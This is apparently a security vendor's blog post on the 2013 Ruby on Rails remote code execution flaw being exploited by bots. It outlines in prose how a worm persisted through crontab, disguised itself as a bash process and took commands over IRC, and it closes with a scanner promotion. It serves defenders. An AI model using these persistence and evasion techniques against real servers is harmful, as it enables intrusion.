On the 28th of January 2013, Ruby on Rails announced the release of versions 3.0.20 and 2.3.16 that addresses an extremely critical security in the framework itself. The vulnerability is a remote code execution and when exploited it allows an attacker to execute code on the remote web server.
In May 2013, automated bots started exploiting this known remote code execution in Ruby on Rails web framework. Even though it took almost four months for the vulnerability to surface in the wild, it seems that it is quite successful. The main reason to why it is so successful is because web servers administrators failed to upgrade their Ruby on Rails framework to the latest and most stable version.
Although most of successful attacks were not documented, in a particular case a malicious hacker who exploited this Ruby on Rails vulnerability managed to withdraw funds from Vircurex, an exchange platform for buying, selling and trading Bitcoins and other various alt-chains. Vircurex had posted on the Bitcoin forum reporting the attack.
It’s been reported that the Ruby on Rails remote code execution is exploited in the wild [*]. This particular worm works by adding a command to the crontab configuration file of the web server. When it gets executed, 3 files are downloaded and executed. Straight after another 2 files are downloaded and executed, one of which is a C source code file that is compiled using the compromised web server gcc compiler and executed.
Once the fifth and last malicious file is downloaded and executed, the process runs under the name of ‘- bash’, so when the web server administrator checks the process list, the malicious process looks like a normal bash process thus does not raise any suspicion.
While the malicious process is running, it connects to a pre programmed IRC bot from where it can receive commands to download and execute files and also to change the server it is connected to. Since there is no authentication control, anyone with basic IT skills can connect to the #rails IRC channel and hijack these infected bots.
Although there are a lot of procedures one can follow to secure web servers or any other server, one of the most reliable ways is to always use the latest version of the software being used. The latest version is not just the most secure, but also the most stable and reliable.
Ensure that your web servers and web applications are secure by scanning them with Netsparker web application security scanner. Apart from detecting vulnerabilities in web applications, Netsparker also detects vulnerabilities in web server software and frameworks. Netsparker also checks if your Ruby on Rails installation is vulnerable to the above mentioned Ruby on Rails remote code execution vulnerability.
Download Netsparker to check if your Ruby on Rails web framework installation is vulnerable.
A discussion between administrators whom web servers fell victims of this attack discussing what they noticed so far on their web servers and in their web server log files can be found here.
* A detailed analysis of the attack by security consultant Jeff Jarmoc can be found here.